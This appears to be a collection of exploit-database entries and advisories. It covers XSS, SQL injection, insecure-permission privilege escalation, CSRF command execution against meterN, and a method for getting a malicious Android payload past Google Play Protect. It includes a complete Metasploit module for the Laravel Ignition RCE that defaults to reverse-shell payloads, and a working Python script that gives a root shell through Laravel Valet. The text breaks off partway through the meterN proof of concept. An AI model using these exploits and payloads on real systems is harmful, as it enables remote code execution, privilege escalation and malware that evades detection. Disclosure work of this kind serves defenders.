<pre><code># Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)<br /># Author: Luis Martinez<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features<br /># Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568<br /># Tested Version: NVR304-16EP<br /># Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr<br /># Vulnerability Type: Reflected Cross-Site Scripting (XSS)<br /># CVE: N/A<br /><br /># Proof of Concept:<br /><br />http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8c9e7906d0ad5d0f2267be0057f2a8e3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Mechbot.a<br />Vulnerability: Insecure Permissions<br />Description: The malware creates a dir with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 8c9e7906d0ad5d0f2267be0057f2a8e3<br />Vuln ID: MVID-2021-0417<br />Disclosure: 12/11/2021<br /><br /><br />Exploit/PoC:<br />C:\>cacls "TitanZone BOT"<br />C:\TitanZone BOT BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir "TitanZone BOT"<br /> Volume in drive C has no label.<br /><br /> Directory of C:\TitanZone BOT<br /><br />06/15/2003 11:24 AM 591 checkmech<br />06/15/2003 11:24 AM 21,854 configure<br />11/19/2021 12:13 AM DIR CONTRIB<br />05/10/2003 02:07 PM 201,216 CYGWIN1.DLL<br />05/10/2003 02:07 PM 4,305 GENUSER<br />07/02/2003 08:44 PM 35 LinkEvents<br />06/15/2003 11:24 AM 1,391 Makefile<br />05/10/2003 02:07 PM 22,882 mech.help<br />07/02/2003 08:40 PM 6 MECH.PID<br />07/02/2003 08:45 PM 2,464 MECH.SET<br />05/10/2003 02:07 PM 796 MKINDEX<br />11/19/2021 12:13 AM DIR randfiles<br />11/19/2021 12:13 AM DIR SRC<br />06/26/2003 09:09 PM 213 titanzone.bat<br />11/19/2021 12:13 AM DIR TOOLS<br />05/10/2003 02:07 PM 192,512 WinMech.exe<br />07/02/2003 08:45 PM 155 winmech.users<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions<br /># Date: 2022-02-15<br /># Exploit Author: Aryan Chehreghani<br /># Contact: aryanchehreghani@yahoo.com<br /># Vendor Homepage: https://www.teamspeak.com<br /># Software Link: https://www.teamspeak.com/en/downloads<br /># Version: 3.5.6 <br /># Tested on: Windows 10 x64<br /><br /># [ About - TeamSpeak ]:<br />#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),<br />#application for audio communication between users on a chat channel,<br />#much like a telephone conference call, Users typically use headphones with a microphone,<br />#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,<br />#The target audience for TeamSpeak is gamers, who can use the software to communicate,<br />#with other players on the same team of a multiplayer video game,<br />#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.<br /><br /># [ Description ]:<br />#The TeamSpeak Application was installed with insecure file permissions.<br />#It was found that all folder and file permissions were incorrectly configured during installation.<br />#It was possible to replace the service binary. <br /><br /># [ POC ]:<br /><br />C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe<br /><br />createfileassoc.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />error_report.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />package_inst.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />Uninstall.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />update.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />Successfully processed 7 files; Failed processing 0 files<br /><br /># [ Exploit - Privilege Escalation ]:<br />#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...<br />#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211213-1 ><br />=======================================================================<br /> title: Stored Cross Site Scripting<br /> product: Sofico Miles RIA<br /> vulnerable version: 2020.2 build 127964T<br /> fixed version: 2020.2 build 128076 or higher<br /> CVE number: CVE-2021-41557<br /> impact: Medium<br /> homepage: https://www.sofico.global<br /> found: 2021-07-09<br /> by: Oualid Lkhaouni (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Sofico is the world’s leading supplier of mission-critical software solutions<br />for automotive finance, leasing, fleet, and mobility management companies,<br />and its software is used by a broad range of renowned leasing companies<br />all over the world."<br /><br />Source: https://www.sofico.global/en/about-sofico<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends updating to the latest version of Sofico Miles RIA.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross Site Scripting (CVE-2021-41557)<br />Miles RIA is a software solution by Sofico that allows leasing companies to manage<br />their leasing services on a single platform.<br /><br />The Miles RIA application is vulnerable to Stored Cross-Site Scripting (XSS).<br />An attacker with access to a user account of the RIA IT or the Fleet role<br />can create a malicious work order in the damage reports section or change<br />existing work orders with malicious JavaScript.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross Site Scripting (CVE-2021-41557)<br />The following payload can be used for the insecure work order number<br />parameter of pending work orders in the damage reports section to inject<br />and execute malicious JavaScript in the context of the victim.<br />Once the victim visits the malicious work order, the attacker-controlled<br />input gets reflected in the lower left context menu of the loaded webpage:<br /><br />1000 <img src=x onerror=alert(document.domain)><br /><br />This JavaScript code will then automatically get executed when the site<br />which contains the payload is visited by the victim.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following software version has been tested and found to be vulnerable:<br />* Miles RIA 2020.2 build 127964T<br /><br />It is unknown whether previous versions are affected, as the vendor did not<br />supply this information.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-26: Contacting vendor through contact.de@sofico.global; No answer.<br />2021-08-24: Contacting vendor through contact.de@sofico.global; No answer.<br />2021-09-21: Contacting vendor through contact.de@sofico.global and contact@sofico.global; No answer.<br />2021-11-04: Informing vendor about public advisory release on 9th November 2021.<br />2021-11-08: Received info from 3rd party about patches.<br />2021-11-24: Informing vendor about public advisory release on 29th November 2021.<br />2021-11-24: Received more detailed info from 3rd party about patches.<br />2021-12-01: Coordination call with vendor.<br />2021-12-13: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides patches for the affected product versions:<br />* Miles RIA 2020.2 build 128076 or higher<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Oualid Lkhaouni / @2021<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Unauthenticated remote code execution in Ignition',<br /> 'Description' => %q{<br /> Ignition before 2.5.2, as used in Laravel and other products,<br /> allows unauthenticated remote attackers to execute arbitrary code<br /> because of insecure usage of file_get_contents() and file_put_contents().<br /> This is exploitable on sites using debug mode with Laravel before 8.4.2.<br /> },<br /> 'Author' => [<br /> 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging<br /> 'ambionics' # discovered<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2021-3129'],<br /> ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']<br /> ],<br /> 'DisclosureDate' => '2021-01-13',<br /> 'Platform' => %w[unix linux macos win],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }<br /> }<br /> ],<br /> [<br /> 'Windows (In-Memory)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => false,<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),<br /> OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])<br /> ])<br /> end<br /><br /> def check<br /> print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'method' => 'PUT'<br /> }, 1)<br /> # Check whether it is using facade/ignition<br /> # If is using it should respond method not allowed<br /> # checking if debug mode is enable<br /> if res && res.code == 405 && res.body.match(/label:"(Debug)"/)<br /> vprint_status 'Debug mode is enabled.'<br /> # check version<br /> versions = JSON.parse(<br /> res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')<br /> )<br /> version = Rex::Version.new(versions['framework_version'])<br /> vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"<br /> # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)<br /> # but it is way more intrusive than just checking the version moreover we would need to call<br /> # the find_log_file method before, meaning four requests more.<br /> return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')<br /> end<br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> @logfile = datastore['LOGFILE'] || find_log_file<br /> fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile<br /><br /> clear_log<br /> put_payload<br /> convert_to_phar<br /> run_phar<br /><br /> handler<br /><br /> clear_log<br /> end<br /><br /> def find_log_file<br /> vprint_status 'Trying to detect log file'<br /> res = post Rex::Text.rand_text_alpha_upper(12)<br /> if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})<br /> logpath = Regexp.last_match(1).gsub(/\\/, '')<br /> vprint_status "Found directory candidate #{logpath}"<br /> logfile = "#{logpath}/storage/logs/laravel.log"<br /> vprint_status "Checking if #{logfile} exists"<br /> res = post logfile<br /> if res.code == 200<br /> vprint_status "Found log file #{logfile}"<br /> return logfile<br /> end<br /> vprint_error "Log file does not exist #{logfile}"<br /> return<br /> end<br /> vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'<br /> return<br /> end<br /><br /> def clear_log<br /> res = post "php://filter/read=consumed/resource=#{@logfile}"<br /> # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)<br /> fail_with(Failure::UnexpectedReply, "Log file #{@logfile} doesn't seem to exist.") unless res.code == 200<br /> end<br /><br /> def put_payload<br /> post format_payload<br /> post Rex::Text.rand_text_alpha_upper(2)<br /> end<br /><br /> def convert_to_phar<br /> filters = %w[<br /> convert.quoted-printable-decode<br /> convert.iconv.utf-16le.utf-8<br /> convert.base64-decode<br /> ].join('|')<br /><br /> post "php://filter/write=#{filters}/resource=#{@logfile}"<br /> end<br /><br /> def run_phar<br /> post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt"<br /> # resp.body.match(%r{^(.*)\n<!doctype html>})<br /> # $1 ? print_good($1) : nil<br /> end<br /><br /> def body_template(data)<br /> {<br /> solution: 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution',<br /> parameters: {<br /> viewFile: data,<br /> variableName: Rex::Text.rand_text_alpha_lower(4..12)<br /> }<br /> }.to_json<br /> end<br /><br /> def post(data)<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'method' => 'POST',<br /> 'data' => body_template(data),<br /> 'ctype' => 'application/json',<br /> 'headers' => {<br /> 'Accept' => '*/*',<br /> 'Accept-Encoding' => 'gzip, deflate'<br /> }<br /> })<br /> end<br /><br /> def generate_phar(pop)<br /> file = Rex::Text.rand_text_alpha_lower(8)<br /> stub = "<?php __HALT_COMPILER(); ?>\r\n"<br /> file_contents = Rex::Text.rand_text_alpha_lower(20)<br /> file_crc32 = Zlib.crc32(file_contents) & 0xffffffff<br /> manifest_len = 40 + pop.length + file.length<br /> phar = stub<br /> phar << [manifest_len].pack('V') # length of manifest in bytes<br /> phar << [0x1].pack('V') # number of files in the phar<br /> phar << [0x11].pack('v') # api version of the phar manifest<br /> phar << [0x10000].pack('V') # global phar bitmapped flags<br /> phar << [0x0].pack('V') # length of phar alias<br /> phar << [pop.length].pack('V') # length of phar metadata<br /> phar << pop # pop chain<br /> phar << [file.length].pack('V') # length of filename in the archive<br /> phar << file # filename<br /> phar << [file_contents.length].pack('V') # length of the uncompressed file contents<br /> phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.<br /> phar << [file_contents.length].pack('V') # length of the compressed file contents<br /> phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents<br /> phar << [0x1b6].pack('V') # bit-mapped file-specific flags<br /> phar << [0x0].pack('V') # serialized File Meta-data length<br /> phar << file_contents # serialized File Meta-data<br /> phar << [Rex::Text.sha1(phar)].pack('H*') # signature<br /> phar << [0x2].pack('V') # signiture type<br /> phar << 'GBMB' # signature presence<br /><br /> return phar<br /> end<br /><br /> def format_payload<br /> # rubocop:disable Style/StringLiterals<br /> serialize = "a:2:{i:7;O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\""<br /> serialize << ":1:{S:41:\"\\00GuzzleHttp\\5cCookie\\5cFileCookieJar\\00filename\";"<br /> serialize << "O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\""<br /> serialize << ":1:{S:9:\"condition\";a:2:{i:0;O:20:\"PhpOption\\LazyOption\""<br /> serialize << ":2:{S:30:\"\\00PhpOption\\5cLazyOption\\00callback\";"<br /> serialize << "S:6:\"system\";S:31:\"\\00PhpOption\\5cLazyOption\\00arguments\";"<br /> serialize << "a:1:{i:0;S:#{payload.encoded.length}:\"#{payload.encoded}\";}}i:1;S:3:\"get\";}}}i:7;i:7;}"<br /> # rubocop:enable Style/StringLiterals<br /> phar = generate_phar(serialize)<br /><br /> b64_gadget = Base64.strict_encode64(phar).gsub('=', '')<br /> payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join<br /><br /> return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'<br /> end<br /><br />end<br /></code></pre>
<pre><code># Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)<br /># Exploit Author: leonjza<br /># Vendor Homepage: https://laravel.com/docs/8.x/valet<br /># Version: v1.1.4 to v2.0.3<br /><br />#!/usr/bin/env python2<br /><br /># Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)<br /># February 2017 - @leonjza<br /><br /># Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.<br /># Reintroduced in v2.0.7 via the 'trust' command again.<br /><br /># This bug got introduced when the sudoers files got added around<br /># commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].<br /><br /># Effectively, when the valet command is installed, composer will symlink [2]<br /># the `valet` command to /usr/local/bin. This 'command' is writable by the user<br /># that installed it.<br />#<br /># ~ $ ls -lah $(which valet)<br /># lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet<br /><br /># Running `valet install`, will start the install [3] routine. The very first action<br /># taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which<br /># will prompt the user for the sudo password in the command line. From here (and in fact<br /># from any point where the valet tool uses sudo) the command can execute further commands<br /># as root without any further interaction needed by the user.<br /># With this 'sudo' access, the installer does it thing, and eventually installs two new<br /># sudoers rules for homebrew[5] and valet[6].<br /><br /># ~ $ cat /etc/sudoers.d/*<br /># Cmnd_Alias BREW = /usr/local/bin/brew *<br /># %admin ALL=(root) NOPASSWD: BREW<br /># Cmnd_Alias VALET = /usr/local/bin/valet *<br /># %admin ALL=(root) NOPASSWD: VALET<br /><br /># The problem with the sudoers rules now is the fact that a user controlled script<br /># (rememeber the valet command is writable to my user?) is allowed to be run with<br /># root privileges. More conveniently, without a password. So, to trivially privesc<br /># using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D<br /><br /># Or, use this lame script you lazy sod.<br />#<br /># ~ $ sudo -k<br /># ~ $ python escalate.py<br /># * Shell written. Dropping into root shell<br /># bash-3.2# whoami<br /># root<br /># bash-3.2# exit<br /># exit<br /># * Cleaning up POC from valet command<br /><br /># [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40<br /># [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39<br /># [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50<br /># [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133<br /># [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177<br /># [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46<br /><br />import os<br />import subprocess<br /><br />MIN_VERSION = "1.1.4"<br />MAX_VERSION = "2.0.3"<br />POC = "/bin/bash; exit;\n"<br /><br /><br />def run_shit_get_output(shit_to_run):<br /> return subprocess.Popen(shit_to_run, shell=True,<br /> stderr=subprocess.PIPE, stdout=subprocess.PIPE)<br /><br /><br />def version_tuple(v):<br /> return tuple(map(int, (v.split("."))))<br /><br /><br />def get_valet():<br /> p = run_shit_get_output('which valet')<br /> lines = ''.join(p.stdout.readlines())<br /><br /> if 'bin/valet' in lines:<br /> return lines.strip()<br /><br /> return None<br /><br /><br />def get_valet_version(valet_location):<br /> p = run_shit_get_output(valet_location)<br /> v = p.stdout.read(25)<br /><br /> return v.split("\n")[0].split(" ")[2]<br /><br /><br />def can_write_to_valet(valet_location):<br /> return os.access(valet_location, os.W_OK)<br /><br /><br />def cleanup_poc_from_command(command_location):<br /> with open(command_location, 'r') as vc:<br /> command_contents = vc.readlines()<br /><br /> if command_contents[1] == POC:<br /> print('* Cleaning up POC from valet command')<br /> command_contents.pop(1)<br /> with open(command_location, 'w') as vc:<br /> vc.write(''.join(command_contents))<br /><br /> return<br /><br /> print('* Could not cleanup the valet command. Check it out manually!')<br /> return<br /><br /><br />def main():<br /> valet_command = get_valet()<br /><br /> if not valet_command:<br /> print(' * The valet command could not be found. Bailing!')<br /> return<br /><br /> # get the content so we can check if we already pwnd it<br /> with open(valet_command, 'r') as vc:<br /> command_contents = vc.readlines()<br /><br /> # check that we havent already popped this thing<br /> if command_contents[1] == POC:<br /> print('* Looks like you already pwnd this. Dropping into shell anyways.')<br /> os.system('sudo ' + valet_command)<br /> cleanup_poc_from_command(valet_command)<br /> return<br /><br /> current_version = get_valet_version(valet_command)<br /><br /> # ensure we have a valid, exploitable version<br /> if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \<br /> or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):<br /> print(' * Valet version {0} does not have this bug!'.format(current_version))<br /> return<br /><br /> # check that we can write<br /> if not can_write_to_valet(valet_command):<br /> print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))<br /> return<br /><br /> # drop the poc line and write the new one<br /> command_contents.insert(1, POC)<br /> with open(valet_command, 'w') as vc:<br /> vc.write(''.join(command_contents))<br /><br /> print('* Shell written. Dropping into root shell')<br /><br /> # drop in the root shell :D<br /> os.system('sudo ' + valet_command)<br /> cleanup_poc_from_command(valet_command)<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection<br /># Date: 11/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Vulnerable Code<br /><br />line 2 in file "mvogms/products/view_product.php<br /><br />$qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=products/view_product&id=3' AND 9973=9973-- ogag<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 29/11/2021<br /># Exploit Author: Mansi Singh<br /># Vendor Homepage: https://wordpress.org/plugins/typebot/<br /># Software Link: https://wordpress.org/plugins/typebot/<br /># Tested on Windows<br /># Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea<br /><br />How to reproduce vulnerability:<br /><br />1. Install Latest WordPress<br /><br />2. Install and activate Typebot Version 1.4.3<br /><br />3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.<br /><br />4. Enter JavaScript payload which is mentioned below<br />"><img src=x onerror=confirm(1)><br /><br />5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.<br /></code></pre>
<pre><code># Exploit Title: Google Play Protect 22.4.25 - Detection Bypass <br /># Date: 2022-02-14<br /># Exploit Author: Aryan Chehreghani<br /># Contact: aryanchehreghani@yahoo.com<br /># Vendor Homepage: https://play.google.com<br /># Version: 22.4.25 (Possibly all versions)<br /># Tested on: Android 5.1.1<br /><br /># [ About - Google Play Protect ]:<br /><br />#Google Play Protect is Google's built-in malware protection for Android,<br />#Backed by the strength of Google's machine learning algorithms, it is always improving in real time,<br />#Google Play Protect continuously works to keep your device, data and apps safe,<br />#It automatically scans your device and makes sure that you have the latest in mobile security, so you can rest easy,<br />#All Android apps undergo rigorous security testing before appearing in the Google Play Store,<br />#Play Protect scans billions of apps daily to make sure that everything remains spot on.<br /><br /># [ Steps ]:<br /><br /># 1.Build a Android Payload<br /># 2.Install the Payload ( The google play protect has detected the payload as unsafe ) <br /># 3.Clear the payload<br /># 4.With Using the Android editor program change the (Target Sdk to '39') <br /># 5.Install Payload again ( The google play protect will not be able to detect the Payload as unsafe )<br /><br /># [ PoC - Video ]: <br /><br />https://drive.google.com/file/d/1KiTalfk7b8VZPJVsCF_EoLsTQob5GVA7/view?usp=sharing<br /></code></pre>
<pre><code><!--<br /><br />meterN v1.2.3 Authenticated Remote Command Execution Vulnerability<br /><br /><br />Vendor: Jean-Marc Louviaux<br />Product web page: https://www.metern.org<br />Affected version: 1.2.3 and 0.8.3.2<br /><br /><br />Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution.<br />It accept any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production<br />and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it<br />simple, fast, with a low foot print to run on cheap and low powered devices.<br /><br />Desc: The application suffers from an authenticated OS command execution vulnerability. This can be<br />exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in<br />admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform<br />these actions through HTTP requests without performing any validity checks to verify the requests.<br />This CSRF can be exploited to perform actions with administrative privileges if a logged-in user<br />visits a malicious web site.<br /><br />---------------------------------------------------------------------------------------------------<br />/admin/admin_meter2.php:<br />------------------------<br /><br />69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {<br />70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');<br />71: } else {<br />72: $COMMANDx = '';<br />73: }<br />...<br />...<br />108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {<br />109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');<br />110: } else {<br />111: $LIVECOMMANDx = '';<br />112: }<br />...<br />...<br />271: exec("$COMMANDx 2>&1", $datareturn);<br />...<br />...<br />303: exec("$LIVECOMMANDx 2>&1", $datareturn);<br /><br />---------------------------------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.10 (Raspbian)<br /> Apache/2.4.46 (Win64)<br /> Linux 4.9.67-v7+ GNU/Linux (armv7l)<br /> Microsoft Windows 10 Home (10.0.19042 Build 19042)<br /> PHP/7.2.33<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2021-5690<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php<br /><br /><br />18.11.2021<br /><br />--><br /><br /><br />PoC #1:<br />-------<br /><br /><html><br /> <body><br /> <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST"><br /> <input type="hidden" name="NUMINDx" value="1" /><br /> <input type="hidden" name="INDNAMEx1" value="test" /><br /> <input type="hidden" name="IDx1" value="1" /><br /> <input type="hidden" name="COMMANDx1" value="calc" /><br /> <input type="hidden" name="bntsubmit1" value="Test command" /><br /> <input type="hidden" name="UNITx1" value="" /><br /> <input type="submit" value="Incongruity" /><br /> </form><br /> </body><br /></html><br /><br /><br />PoC #2:<br />-------<br /><br /><html><br /> <body><br /> <form action="http://localhost/metern/admin/admin_meter2.php" method="POST"><br /> <input type="hidden" name="METNAMEx" value="Conso" /><br /> <input type="hidden" 